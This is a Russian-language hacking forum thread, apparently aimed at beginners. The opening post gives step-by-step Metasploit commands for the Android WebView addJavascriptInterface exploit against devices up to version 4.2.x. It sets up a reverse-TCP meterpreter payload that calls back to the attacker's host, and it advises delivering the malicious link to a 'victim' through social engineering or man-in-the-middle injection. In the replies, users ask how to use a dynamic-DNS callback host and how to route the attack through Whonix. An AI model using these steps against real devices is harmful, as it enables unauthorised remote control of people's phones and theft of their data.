Статья Android WebView Exploit или взлом андроида по ссылке

Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)

5.png


Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:

1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код: 
use exploit/android/browser/webview_addjavascriptinterface
1.jpg


3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
3.jpg


4) Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...

4.png


5)Ловим метерпретер сессию

6.jpg


 
  • Нравится
Реакции: Anomalya, mz111, konstata3 и ещё 6
Нажмите, чтобы раскрыть...
Прошу прощения, если ошибаюсь, но тема, которую вы дали, тоже для старых версий андройда.
 
kinevkt сказал(а):
Прошу прощения, если ошибаюсь, но тема, которую вы дали, тоже для старых версий андройда.
Нажмите, чтобы раскрыть...
Поддерживаю. DarkNode : Как быть с android 5.0/5.1/6/0 ?
[doublepost=1489347544,1489330382][/doublepost]DarkNode: Вопрос от новичка. Возможно ли заменить конечную нагрузку (цифры которые получаются, ваш пример 192.168.137.152: 4444 ) на название (например от no-ip) ? Например " newslife.ddns.net :8080 "
[doublepost=1489352321][/doublepost]DarkNode: Что делать если отсутствует AutoLoadAndroid true
и пользуешься whonix gateway ( прописывать айпишник в rsvhost, lhost который я сам назначил 10.152.152.68 ) ?
 

Вложения

  • 1.PNG
    1.PNG
    78,7 КБ · Просмотры: 263
  • 2.PNG
    2.PNG
    46,2 КБ · Просмотры: 229
Последнее редактирование:
Как настроить eth 1 интернет подключения (чтобы появился ip адрес кроме eth0 10.0.2.15) ?
 
а где и как искать новые браузер эксплойты под андроид
 
Видос можно перезалить ? На файлообменик
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ